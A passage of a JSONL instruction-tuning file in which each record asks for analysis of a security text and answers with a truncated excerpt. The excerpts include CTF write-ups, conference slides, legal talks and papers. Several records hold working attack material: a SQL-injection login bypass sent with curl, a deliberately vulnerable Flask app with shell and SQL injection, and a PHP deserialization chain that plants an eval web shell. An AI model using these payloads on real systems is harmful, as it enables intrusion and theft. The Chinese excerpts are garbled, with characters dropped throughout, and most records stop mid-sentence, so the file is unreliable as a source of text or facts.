户端般通过kubectl命令具与kube-apiserver进交互当然如果不嫌麻烦也可以直接通过调 kube-apiserver的api来交互户端命令下发通常流程如下 1客户端根据户需求调kube-apiserver相应api2kube-apiserver根据命令类型联动 master节点内的kube-controller-manager和kube-scheduler等组件通过kubelet进下发新建容器配 置或下发执命令等给到对应node节点3node节点与容器进交互完成下发的命令并返回结果4 master节点最终根据任务类型将结果持久化存储在etcd中 k8s集群主要由以下组件组成1kube-apiserverk8s master节点api服务器以REST API服务形 式提供接作为整个k8s的控制2kube-controller-manager执整个k8s的后台任务包 括节点状态状况Pod个数Pods和Service的关联等3kube-scheduler接收来kube- apiserver创建Pods任务通过收集的集群中所有node节点的资源负载情况分配到某个节点4 etcdk8s的键值对形式数据库,保存了k", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Irish-Name-Repo 1 Web Exploitation, 300 points ## Description: > There is a website running at http://2019shell1.picoctf.com:4162. Do you think you can log us in? Try to see if you can login! ## Solution: The website offered an admin login page: ```html <form action=\"login.php\" method=\"POST\"> <fieldset> <div class=\"form-group\"> <label for=\"username\">Username:</label> <input type=\"text\" id=\"username\" name=\"username\" class=\"form-control\"> </div> <div class=\"form-group\"> <label for=\"password\">Password:</label> <div class=\"controls\"> <input type=\"password\" id=\"password\" name=\"password\" class=\"form-control\"> </div> </div> <input type=\"hidden\" name=\"debug\" value=\"0\"> <div class=\"form-actions\"> <input type=\"submit\" value=\"Login\" class=\"btn btn-primary\"> </div> </fieldset> </form> ``` In order to bypass the authentication logic, all we needed to do is provide a classic SQLi string: ```console root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_1# curl \"https://2019shell1.picoctf.com/problem/4162/login.php\" --data \"username=admin&password='+or+1=1--\" && echo <h1>Logged in!</h1><p>Your flag is: picoCTF{s0m3_SQL_96ab211c}</p> ``` It was also possible to set the `debug` parameter in order to inspect the SQL statement: ```console root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_1# curl \"https://2019shell1.picoctf.com/problem/4162/login.php\" --data \"username=admin&password='+or+1=1--&debug=1\" && echo <pre>username: admin password: ' or 1=1-- SQL query: SELECT * FROM users WHERE name='admin' AND password='' or 1=1--' </pre><h1>Logged in!</h1><p>Your flag is: picoCTF{s0m3_SQL_96ab211c}</p> ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0 KaiSong (exp-sky) Tencent Security Xuanwu Lab WHO AM I CONTENTS 1Chakra vulnerability 2Bypass ASLR & DEP 3Bypass CFG 4Bypass CIG 5Bypass ACG 6Exploit 7Q&A The vulnerability was discovered on May 31, 2016. The vulnerability was fixed in February 2017. NativeIntArray struct : NativeIntArrayHead Segment : left length size Next segment head Segment : left length size Next segment Buffer Buffer length NativeIntArray struct : Make var_Array_1 object reach a special state. Make var_Array_1->length smaller. Make var_Array_1 object reach a special state. Array.length < (head.next.left + head.next.length) 0x2e < (0x03d2 + 0x2e) Segment : head Left:0x00000000 Length:0x00000000 Size:0x00000012 Next segment Segment : head.next Left:0x000003d2 Length:0x0000002e Size:0x0000002e Next segment Buffer:0x00000012*4 Buffer:0x0000002e*4 NativeIntArrayHead head Length:0x0000002e Make var_Array_1 object reach a special state. Array.length < (head.next.left + head.next.length) 0x2e < (0x03d2 + 0x2e) Make var_Array_1 object reach a special state. Callback function causes length to be modified. But the ReverseHelper function still uses the old length. Segment : head Left:0x00000000 Length:0x00000000 Size:0x00000012 Next segment Segment : head.next Left:0x000003d2 Length:0x0000002e Size:0x0000002e Next segment Buffer:0x00000012*4 Buffer:0x0000002e*4 NativeIntArrayHead head Length:0x0000002e Make var_Array_1 object reach a special state. Array.length < (head.next.left + head.next.length) 0x2e < (0x03d2 + 0x2e) step 1 Make var_Array_1->head.size smaller. step 1 var_Array_1->head.size : 0x2e -> 0x23 var_Array_1->head.size : 0x23 < var_Array_1->head.length : 0x2e Segment : head Left:0x00000000 Length:0x0000002e Size:0x00000023 Next segment Segment : head.next Left:0x00000023 Length:0x0000000b Size:0x00000012 Next segment Buffer:0x0000002e*4 Buffer:0x00000012*4 NativeIntArrayHead head Length:0x0000002e step 1 var_Array_1->head.size : 0x2e -> 0x23 var_Array_1->head.size : 0x23 < var_Array_1->head.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n互联网企业安全建设实践 北京站/3.29 靳晓飞 VIPKID安全中心 从这里说起 互联网企业安全建设整体思路 互联网企业面临安全挑战分析 互联网企业核心安全目标 互联网企业核心安全能力建设与提升 互联网企业整体安全视角 互联网企业基础安全体系建设框架 互联网企业安全建设蓝图 互联网企业安全建设如何落地实施 分阶段安全体系建设 如何评价企业安全建设的效果 基础安全全链路纵深防御架构 API 安全监控实践 需要对哪些API进行安全监控  注册接口  登录接口  找回密码接口  订单详情接口  收货地址接口  其他所有可能会被刷的API 安全监控目标设定  具备对高风险API被刷的分钟级主动发 现和感知能力并可与安全防御系统 联动实现自动化安全防护 技术上如何实现  流量分析  日志分析 API 安全监控实践 API 安全监控实践 Github安全监控实践 Github安全监控实践 项目地址https://github.com/VKSRC/Github-Monitor 做好企业安全建设的必要条件 写在最后 未知攻焉知防网络攻防对抗本质上是人与人之间的较量在安全建 设和安全运营过程中企业安全人员不能仅限于被动防御还需要积极转变思 路以攻击者视角来看待和审视安全风险做到攻防兼备化被动为主动 Thanks", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTop Ten Legal Questions* DEFCON 13 Jennifer S. Granick 1. Is it legal to sniff wireless networks? 2. What are the state and federal laws regulating access to computer systems? 3. How did the USA PATRIOT Act change computer crime investigation and prosecution? 4. Under what circumstances can the government collect information about me? 5. Does encryption protect me from surveillance, how can I protect my passwords and can the law compel me to turn passwords over? 6. What is the statute of limitations on computer crime cases? 7. When are computer logs and other digitally generated records admissible as evidence? 8. Whats the future of copyright laws like the DMCA and surveillance laws like the USA PATRIOT Act? 9. Is using encryption evidence of criminal intent? 10. How do I know when I need to talk to a lawyer? *Questions subject to change, but feel free to ask your questions during or following the talk. This talk is intended for informational purposes only. The talk is not intended to be, nor should it be interpreted as, legal advice or opinion. Neither the talk nor any information conveyed during the question and answer period creates an attorney-client relationship or any other relationship with the speaker. Contact information: Executive Director, Center for Internet and Society Stanford Law School jennifer @ law.stanford.edu http://cyberlaw.stanford.edu/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom flask import Flask, abort, redirect, request, Response import base64, json, MySQLdb, os, re, subprocess app = Flask(__name__) home = ''' <title>Magical Image Gallery</title> <h1>Magical Image Gallery</h1> $ALBUMS$ ''' viewAlbum = ''' <title>$TITLE$ -- Magical Image Gallery</title> <h1>$TITLE$</h1> $GALLERY$ ''' def getDb(): return MySQLdb.connect(host=\"localhost\", user=\"root\", password=\"\", db=\"level5\") def sanitize(data): return data.replace('&amp;', '&amp;').replace('&lt;', '&lt;').replace('&gt;', '&gt;').replace('\"', '\"') @app.route('/') def index(): cur = getDb().cursor() cur.execute('SELECT id, title FROM albums') albums = list(cur.fetchall()) rep = '' for id, title in albums: rep += '<h2>%s</h2>\\n' % sanitize(title) rep += '<div>' cur.execute('SELECT id, title, filename FROM photos WHERE parent=%s LIMIT 3', (id, )) fns = [] for pid, ptitle, pfn in cur.fetchall(): rep += '<div><img src=\"fetch?id=%i\" width=\"266\" height=\"150\"><br>%s</div>' % (pid, sanitize(ptitle)) fns.append(pfn) rep += '<i>Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\\n', 1)[-1] + '</i>' rep += '</div>\\n' return home.replace('$ALBUMS$', rep) @app.route('/fetch') def fetch(): cur = getDb().cursor() if cur.execute('SELECT filename FROM photos WHERE id=%s' % request.args['id']) == 0: abort(404) # It's dangerous to go alone, take this: # FLAGFLAG0$FLAG$ return file('./%s' % cur.fetchone()[0].replace('..', ''), 'rb').read() if __name__ == \"__main__\": app.run(host='0.0.0.0', port=80)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDrinking From the Caffeine Firehose We call SHODAN. By Viss! Prepared for Defcon 20 Thursday, July 12, 12 This is not just another shodan talk. Today we turn shodan into a gateway drug. Thursday, July 12, 12 What do people put on the internet? Routers, switches, servers, printers.. Meh. seen it. Show me something new! Thursday, July 12, 12 Whats on the internet that nobody is accounting for? ... is anybody actually checking? Seriously, has anybody ever done this? Thursday, July 12, 12 Apparently not! Thursday, July 12, 12 A little editorial on policy.... If you cant scan yourself freely, how do you determine your level of exposure? Whats the attack surface? Thursday, July 12, 12 Before we begin.. Everything found here is PUBLIC No credentials required no secure systems. This is all free play. Thursday, July 12, 12 Also, No systems were altered. This was a READ ONLY Exercise. Thursday, July 12, 12 Webcams! Thursday, July 12, 12 Who watches the watchers? Thursday, July 12, 12 Who watches the watchers? Meeeeeeee >:D Thursday, July 12, 12 Scada gear on webcams! Thursday, July 12, 12 Other stuff on webcams! Thursday, July 12, 12 But most cameras are boring Thursday, July 12, 12 This thing! ... (no idea) Thursday, July 12, 12 A um.. T-2000 ! .. ... whats a T-2000?.. relion? Thursday, July 12, 12 Its a hydrogen fuel cell. Thursday, July 12, 12 Looks industrial! Thursday, July 12, 12 Gets used a lot in .mil... Thursday, July 12, 12 This is how you use it Thursday, July 12, 12 So where do you find these things? Thursday, July 12, 12 Oh.. Thursday, July 12, 12 Security is a joke. Thursday, July 12, 12 Wind farms! Thursday, July 12, 12 Lighting, HVAC, Alarms Thursday, July 12, 12 More hvac/lighting Thursday, July 12, 12 Power meters? Thursday, July 12, 12 Heat pumps Thursday, July 12, 12 Bigger heat pumps Thursday, July 12, 12 Private residences?! Thursday, July 12, 12 ... trending data? Thursday, July 12, 12 Water heaters Thursday, July 12, 12 Familiar displays! Thursday, July", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBinder Fuzz based on drozer & Some interesting Vulnerabilities sharing (@0xr0ot) Kcon Beijing 2016 0xr0ot.sec@gmail.com Who am I  ID:0xr0ot(not 0xroot)  Security researcher(2 years)  Mainly focus on Android security  Always like basketball Agenda  drozer introduction  Binder fuzz model  Case share  How to exploit Drozer Architecture  console  agent  server Functionality  Exploit  Scanner Metasploit? Design Principles  Reflection  Class loading Drozer mode  direct mode  infrastructure mode Commands drozer server start --port port drozer exploit build exploit.usb.socialengineering.usbdebugging --server ip -- credentials username password drozer console connect --server ip:port --password Writing a module Binder fuzz  fuzz intent  fuzz service call Why use drozer? I am familiar with it,XD! Fuzz model  drozer module(core)  external python script(control logic) All in the one drozer module is OK Case Share  LockScreen bypass(or clear)  Fake shutdown (eavesdropping)  Capability leak  System Dos LockScreen bypass(CVE-2016-3749) CVE-2016-3749 Details Windfall CVE-2016-3749 Patch My first high severity issue Fake Shutdown(eavesdropping)  Samsung Capability Leak  nexus series car mode  samsung change theme Video demonstration System Dos(restart)  nexus(3) Video demonstration.  samsung(11) Samsung Acknowledgements Good News How to exploit(system service vulnerability)  use AIDL file  use java reflection  native layer  shell script Exploit-use AIDL file  The Android SDK tools will help to generate an interface in the Java programming language, based on the .aidl file you import.  The ***.aidl file not found,but its just there.If the similar error occurs,you can write the java code manually. Reference: Android Bound Service(by ) http://drops.wooyun.org/mobile/13676 Exploit-use AIDL file Exploit-use reflection  The nature is the same as use AIDL file.  It doesnt need .AIDL file. Exploit-native Exploit-shell script  clear.sh  key code: Runtime runtime = Runtime.getRuntime(); Proce", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0xcsandker  csandker  RSS Feed //Posts //History of Windows //Archive //Tags & Search //ME  Switch Theme Offensive Windows IPC Internals 3: ALPC 24 May 2022 (Last Updated: 29 5 2022) >> Introduction >> ALPC Internals >> The Basics >> ALPC Message Flow >> ALPC Messaging Details >> ALPC Message Attributes >> Putting the pieces together: A Sample Application >> Attack Surface >> Identify Targets >> Impersonation and Non-Impersonation >> Unfreed Message Objects >> Conclousion >> Appendix A: The use of connection and communication ports Contents: >> References After talking about two inter-process communication (IPC) protocols that can be uses remotely as well as locally, namely Named Pipes and RPC, with ALPC were now looking at a technology that can only be used locally. While RPC stands for Remote Procedure Call, ALPC reads out to Advanced Local Procedure Call, sometimes also referenced as Asynchronous Local Procedure Call. Especially the later reference (asynchronous) is a reference to the days of Windows Vista when ALPC was introduced to replace LPC (Local Procedure Call), which is the predecessor IPC mechanism used until the rise of Windows Vista. A quick word on LPC The local procedure call mechanism was introduced with the original Windows NT kernel in 1993-94 as a synchronous inter-process communication facility. Its synchronous nature meant that clients/servers had to wait for a message to dispatched and acted upon before execution could continue. This was one of the main aws that ALPC was designed to replace and the reason why ALPC is referred to by some as asynchronous LPC. ALPC was brought to light with Windows Vista and at least from Windows 7 onward LPC was completely removed from the NT kernel. To not break legacy applications and allow for backwards compatibility, which Microsoft is (in)famously known for, the function used to create an LPC port was kept, but the function call was redirected to not create an LPC, but an ALPC port. CreatePort API Call in W", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOld-Skool Brought Back A 1964 Modem Demo K.C. Budd \"phreakmonkey\" Taylor Banks \"dr. kaos\" Modems, explained Modulator / Demodulator Modulator: Encodes a digital signal over an analog representation Demodulator: Reconstructs the digital signal from the analog representation Digital signal rate = bits per second (bps) Analog \"symbol\" rate = baud In many cases, bps != baud Timeline of Modem History ~1959 \"Bell 101\" 110 baud standard, Anderson-Jacobson modems introduced for private-line use by US Military 1962 \"Bell 103\" 300 baud standard, AT&T commercial modems introduced ~1963 Livermore Data Systems Model A 1968 \"The Carterphone Decision\" - allowing third party devices to be electrically connected to telephone lines* 1972 Vadic 1200bps modem 1976 AT&T Bell 212A 1200bps standard 1981 Hayes 300bps \"Smartmodem\" Hayes AT-Command Set 1958 1968 1978 1988 Ladies and Gentlemen: A circa 1964 Livermore Data Systems Model A Modem Serial # 0279 So, wait. 1964? Isn't that older than you are? Comment on gizmodo.com : By: 92BuickLeSabre 10:12 PM on Thu May 28 2009 That was surprisingly bad-ass. (Especially the part at the beginning where he ripped off the poor grieving little old lady.) Model A: Physical Characteristics Hand Crafted Wood Box Dovetail Joints Brass Hardware Notch-cutout for Phone Handset Cord Labels Model A: Technical Characteristics Modulation: Bell 103 300 baud / 300 bps Originate Mode Only Frequency Shift Keying No error correction Directly Modulates RS232 TX line No internal clock No handshaking / synchronization Requires +/- 12V RS232 levels 5V TTL levels will not work Bell 103 Modulation FSK: RS232 TX Line: Carrier: Modulated Signal: Originate Mode: Mark = 1270 Hz Space = 1070 Hz Answer Mode: Mark = 2225 Hz Space = 2025 Hz mark space What Use is 300 baud? Terminal Sessions Troubleshooting Data Entry Data Transfers Program Submission Text files Reporting Business reports (ledgers, inventory, &etc) Status Monitoring Remote Sensing One Personal Account From: winnal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nScanner Frequencies: Clark County Trunking System, Clark County, Nevada http://radioreference.com/modules.php?name=RR&sid=669 1 of 6 6/18/2007 14:49 NOT LOGGED IN Home  Your Account  Forums  Database  Wiki  Submit Info Search RR Help Desk Clark County System US > Nevada > Clark County System Information Last Updated on 04-16-2007 18:37 System Name: Clark County Location: Clark County, NV County: Clark System Type: Motorola Type II SmartZone System Voice: Analog Sysid: 4A36 CT: 116.13 Last Updated: Added a set of talkgroups Hits: 16371 Latest News Update Posted on 2007-01-09 20:47:11 860.4375 additional system frequency; also used as a control channel; unknown site. Click Here to Display All Past News Updates (3 Total) System Frequencies Red* are Primary Control Channels, Blue* are alternate control channels Site Description Freqs 001 Las Vegas Simulcast 856.43750 856.76250 857.48750 857.76250 858.76250 859.26250 859.46250 859.93750 860.43750 860.48750* 860.93750* 868.30000 868.65000 868.82500 Home History Downloads NV Trunking Submit Watch Admin Paramedic Ringtones Send 10 Complimentary Ringtones to your cell. Scanner Frequencies: Clark County Trunking System, Clark County, Nevada http://radioreference.com/modules.php?name=RR&sid=669 2 of 6 6/18/2007 14:49 002 Apex Peak (Las Vegas) 857.98750 866.46250 867.16250 868.26250 868.55000 868.73750* 868.80000 003 Angel Peak (Mount Charleston) 860.76250 866.32500 866.80000 867.12500 867.32500 867.37500* 868.33750* 006 Site-6 868.50000* 008 Site-8 867.45000* System Talkgroups Updated in the last 7 days Updated in the last 24 hours List All in one table Clark County / Las Vegas Fire Talkgroups DEC HEX Description 40976 a01 Ch. 1 - Las Vegas East Dispatch (Zone 1) 41008 a03 Ch. 2 - Clark County West (Zone 3) 41040 a05 Ch. 3 - Clark County East (Zone 3) 41072 a07 Ch. 4 - Las Vegas West Dispatch (Zone 1) 41104 a09 Ch. 5 - North Las Vegas 41136 a0b Ch. 6 - Clark County South (Zone 3) 41200 a0f Henderson / Clark County Mutual Chann", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# TokyoWesterns 2020 ### Table of contents * [`easy_hash` (crypto/warmup)](easy_hash) * [`sqrt` (crypto)](https://ctftime.org/writeup/23620) * [`twin-d` (crypto)](https://ctftime.org/writeup/23632) * [The Melancholy of Alice (crypto)](https://ctftime.org/writeup/23633) * [urlcheck v1 (web)](https://bonusplay.pl/writeups/urlcheckv1) * [urlcheck v2 (web)](urlcheck_v2) * [Angular of the Universe (flag 1), and Angular of another Universe (web)](https://bonusplay.pl/writeups/angular_of_the_universe) * [smash (pwn)](smash) * [Reversing iS Amazing (re)](reversing_is_amazing/rsa.py) * [Nothing more to say (pwn)](nothing_more_to_say/exploit.py) * [mask (misc)](mask/solve.py) * [tamarin (re)](tamarin) * [Does Linux dream of Windows (web, misc)](does_linux_dream_of_windows) * [bfnote (web)](bfnote) * [XOR and shift encryptor (crypto)](xor_and_shift/solve.sage)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTCTF WriteUp By Nu1L TCTF WriteUp By Nu1L WEB soracon 1linephp worldcup Reverse vp FEA lalamblambdadambda Crypto zer0lfsr- checkin PWN listbook how2mutate uc_masteeer Babyheap 2021 MISC uc_baaaby GutHib welcome singer Survey WEB soracon phpsolrint pop chain <?php namespace Phalcon\\Logger { class Item { public $context; public $time; public $levelName; public $message; public function __construct($context, $time, $levelName, $message) { $this->context = $context; $this->time = $time; $this->levelName = $levelName; $this->message = $message; } } } namespace Phalcon\\Logger\\Formatter { class Line { public $format; public $dateFormat; public function __construct($format, $dateFormat) { $this->format = $format; $this->dateFormat = $dateFormat; } } } namespace Phalcon\\Logger\\Adapter { class Stream { public $name; public $inTransaction; public $mode; public $queue; public $formatter; public function __construct($name, $mode, $queue, $formatter) { $this->inTransaction = 1; $this->name = $name; $this->mode = $mode; $this->queue = $queue; $this->formatter = $formatter; } } } namespace { $time = new DateTimeImmutable(); $item = new Phalcon\\Logger\\Item([], $time, \"test\", \"test\"); $line = new Phalcon\\Logger\\Formatter\\Line('MTIzPD9waHAgcGhwaW5mbygpO2V2YWwoJF9HRVRbInh4Il0pOz8+', \"Y-m-d H:i:s\"); $queue1 = [$item]; $stream = new Phalcon\\Logger\\Adapter\\Stream(\"/tmp/x.php\", \"w\", $queue1, $line); $x = serialize($stream); header('Content-Type:text/xml'); $c = '<?xml version=\"1.0\" encoding=\"UTF-8\"?> <solr_document> <arr> <int>1;i:1;' . $x . ';i:2;s:17:\"a</int> <int>1</int> <int>2\"</int> </arr> </solr_document>'; echo $c; } <?php namespace Phalcon{ class Di{ public $services; public function __construct($funcname, $service, $eventsManager, $evil_func_name,$s2){ $possibleService = lcfirst(substr($funcname, 3)); $this->services = [$possibleService => $service, \"modelsManager\"=>$s2]; $this->eventsManager = $eventsManager; $this->sharedInstances = [$possibleService => $evil_func_name ]; } } cl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! ! Attacks from Within: Windows Spreads Mirai to Enterprise IoT - Draft Steinthor Bjarnason Arbor Networks, ASERT sbjarnason@arbor.net Jason Jones Arbor Networks, ASERT jasonjones@arbor.net Abstract When the Mirai IoT Bot surfaced in September 2016, it received a lot of publicity, not only because of the large-scale attacks it launched against highly visible targets, but also due to the large scale compromise of IoT devices. This allowed the attackers to subsume 100,000s of vulnerable, poorly secured IoT devices into DDoS bots, gaining access to resources that could launch powerful DDoS attacks. However, as the original Mirai bot code scanned public Internet addresses to find new devices to infect, in most cases it was unable to detect and compromise IoT devices provisioned behind firewalls or NAT devices. As most firewalls stop these kind of scanning attacks, the (potential millions of) IoT devices behind firewalls were safe against detection and compromise. Or so most people thought 1 Enter the Mirai Windows Seeder ! In early February of 2017, a multi-stage Windows Trojan containing code to scan for vulnerable IoT devices and inject them with the Mirai bot code was detected in the wild. This weaponization of a Windows Trojan to deliver IoT bot code reveals an evolution in the threat landscape that most organizations are completely unprepared to deal with: DDoS attacks from within. Windows machines infected by the Seeder will now actively scan for IoT devices whenever they establish a network connection. For example, if a laptop gets compromised by the Windows Mirai Seeder on a public wireless network, it will start scanning for vulnerable IoT devices as soon as it makes a network connection. This includes connecting to internal corporate networks via VPN, connecting to Wireless networks, or by using a physical network connection. This is somewhat related to the old paradigm of attacking medieval castles. The castle walls (analogy: modern firewalls) were usually v", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 tls指纹 具体可参考这个 go默认使的client hello配置是固定不变的导致特征也是固定的所以需要做改动 go默认ja3指纹89be98bbd4f065fe510fca4893cf8d9b chromeja3指纹cd08e31494f9531f560d64c695473da9 共分为五个部分 SSLVersion,Cipher-Suites,SSLExtension,EllipticCurve,EllipticCurvePointFormat 为了尽量模拟浏览器的client hello我们先下go和chrome的tls指纹组成 go chrome SSLVersion致 可以修改Cipher-Suites 在pkg/transport/tls.gotls.Config持CipherSuites修改如下 ja3 此处为语雀内容卡点击链接查看https://www.yuque.com/go/doc/61846405?view=doc_embed 771,49199-49200-49195-49196-52392-52393-49171-49161-49172-49162-156-157-47- 53-49170-10-4865-4867-4866,5-10-11-13-65281-18-43-51,29-23-24-25,0 1 XML 复制代码 771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157- 47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-17513-21,29-23-24,0 1 XML 复制代码 2 SSLExtension,扩展列表这个实在不好改go的官tls库chrome少了不少参数所以这个就先别做修 改了 EllipticCurve 椭圆曲线密码刚好也持这个选项配置就做调整 EllipticCurvePointFormat 最后项椭圆曲线格式默认均为0所以不做改动 总之共只需要修改两处 修改后指纹也就变化了可以区别于默认go程序的指纹但还法做到和浏览器致后续需要魔改 官tls库来兼容更多的extension才能实现完全模拟 base.CipherSuites = []uint16{4865,4866,4867,49195,49199,49196,49200,52393,5 2392,49171,49172,156,157,47,53} 1 XML 复制代码 base.CurvePreferences = []tls.CurveID{tls.X25519, tls.CurveP256, tls.CurveP 384} 1 XML 复制代码 3 章 https://mp.weixin.qq.com/s/og2IKo8lcydh8PROUPD7jQ https://segmentfault.com/a/1190000041699815 库 https://github.com/refraction-networking/utls 这个库是基于crypto/tls进开发的可以模拟绝部分情况下的ja3指纹 和官库差不多的法如下在封装时除了conn连接和config配置以外需要传  ClientHelloID 这个ID是有些内置的指纹可以直接调或者也可以定义 这是官库 u_common.go如下有常全的现成指纹信息可以 实现 conn, _ := net.DialTimeout(\"tcp\", \"121.14.77.201:443\", 10*time.Second) uConn := tls.UClient(conn, &tls.Config{ServerName: \"www.qq.com\", Insecu reSkipVerify: true}, tls.HelloChrome_102) uConn.Write([]byte(\"aaa\")) 1 2 3 Go 复制代码 4 这些ID最终对应到这个函数 utlsIdToSpec  5 后续可参考这边编写实现的 6 并且该库还持解析数据包中的client hello信息来动化构建个定义参数实现模拟各种ja3指纹 浏览器访问然后抓包找到client hello包选中tls层的数据然后复制成hex stream即可 7 将tls的hex数据粘贴到以下位置通过 fingerprinter.FingerprintClientHello 即可解析 成个定义spec封装到tlsConn直接使 要注意的是 ClientHelloID 还设置成 HelloCustom 即定义 8 可以看到完全致wireshark好像3.6以上就持ja3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n某付宝登录js分析 收录于合集 #JS逆向 4个 aHR0cHM6Ly93d3cuYWxpcGF5LmNvbS8= f12 network Ctrl+Shift +F 局搜索需要解密的password关键字 2021-09-18 19:22 原创 不愿透露姓名的热友 位不愿透露姓名的热友 多次调试后最终在index.js中的393找到getPassword的法转搜索getPassword声明 位置在index.js中4979地找到声明信息 然后下断点对发包请求内容发现n的内容password字段信息内容n是 e.alipayEncrypt(2,i,t)传过来的所以只需要 由此可得 1 return e.alipayEncrypt(2,i,t) 1 2 n --> e .alipayEncrypt() e --> new s.RSA 先跟进下s.rsa 可以知道 s.RSA 是个 function 跟进 s.RSA 发现来到了 Wi 法名字不样的原因可能是 在上的代码重新赋值了名字不过不重要发现这个法是规定 key_size 和 exponent 的 回到getpassword找到加密法 e .alipayEncrypt() 发现也是 Wi 接着发现 Wi 是从 Gi 过 来的.....这种情况下发现加密法和其他js代码在同个js内有万代码的只能费时间 选择性的扣有代码了 3 4 s -- > ? ....... 回到 getPassword 法附近找到 s 是怎么来的在4971找到 s = security_crypto_200_index 这时候搜索 security_crypto_200_index 把js法扣下来 security_crypto_200_index内容是键值对我们只需要s.RSA也就是 security_crypto_200_lib_rsa 通过crtl+f 搜索相关信息可以找到security_crypto_200_lib_rsa开头结尾这个就是Wi 了具体在哪判断和调试了概为下内容 根据所需要的法 在不考虑 i 变动的情况下调代码剩下的就是和 s.RSA 样的步骤扣出 是 s.Base64 了 1 2 3 4 5 6 7 security_crypto_200_index = function(t) { return t = { Base64: security_crypto_200_lib_base64, xor: security_crypto_200_lib_xor, RSA: security_crypto_200_lib_rsa } }() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 security_crypto_200_lib_rsa = function(t) { function e(t, e, i) { null != t && (\"number\" == typeof t ? this.fromNumber(t, e, i) } ********* ************ ************** **************** return this.key }, Wi.prototype.getPrivateKey = function() { return this.getKey().getPrivateKey() }, Wi.prototype.getPrivateKeyB64 = function() { return this.getKey().getPrivateBaseKeyB64() }, Wi.prototype.getPublicKey = function() { return this.getKey().getPublicKey() }, Wi.prototype.getPublicKeyB64 = function() { return this.getKey().getPublicBaseKeyB64() }, t = Wi }() function getPassword(pwd) { var s = security_crypto_200_lib_rsa; var e = new s; //var i = security_crypto_200_lib_base64; //s.decode(options.TS); e.setPublicKey(\"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAo0z/L+pelCPu6 DwDFAY/3ITzesr8lnNmYjHht4XUJvLYYBwvDbHMc8xi9sPK9ohVHIKRVLVmmZ9", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe USA PATRIOT Act and You: A Legal Update  Jennifer Stisa Granick, Esq.  Stanford Law School  Center for Internet & Society  559 Nathan Abbott Way  Stanford, CA 94305  650-724-0014  jennifer@granick.com What Can I Do?  Lobbying Works: Call or Write Your Congressperson  Get Educated  American Civil Liberties Union: http://www.aclu.org/issues/cyber/hmcl.html  Electronic Frontier Foundation: www.eff.org/Privacy/Surveillance/Terrorism_militias/20011031_ef f_usa_patriot_analysis.html  Center For Democracy and Technology: www.cdt.org  Electronic Privacy Information Center: www.epic.org What is the USAPA? Drafted Before September 11 Rapidly Passed Following 9/11 Increases Govt Surveillance Powers Foreign Intelligence and L.E. Can Share Information Defines More Terrorist Offenses, Including Some Hacking Government Surveillance Increases Ability of Law Enforcement to Obtain Information Problem is Lack of Judicial Oversight and Review Changes to L.E. Power  BEFORE  Subscriber Info available with Subpoena.  IPs, payment info, including CC and bank acct numbers available with 2703(d) order  Email headers: arguably content data (Title III Warrant) AFTER  Now includes IP, information re: payments, session times and durations. Sec 210, 211  Pen Register/Trap and Trace Order (Issue, subject line) Changes to L.E. Power (cont) BEFORE  Web surfing: Arguably Title III warrant or 2703(d) order  Searches of Email Content (Search warrant or subpoena w/ notice) AFTER  Pen Register/Trap and Trace Order  Extended Ability to Delay Notice Changes to L.E. Power (cont) BEFORE  Wiretap authorization in district where telephone/computer is located  Voicemail requires Title III Warrant AFTER  Roving wiretaps  Search warrant Changes to L.E. Power (cont) BEFORE  Needed court order to monitor computer users  Voicemail requires Title III Warrant AFTER  If use is unauthorized then L.E. may monitor with permission of system owner  Search warrant Changes to L.E. Power (cont) BEFORE  ISPs may not disclos", "category": "text_analysis", "source": "security_papers"}
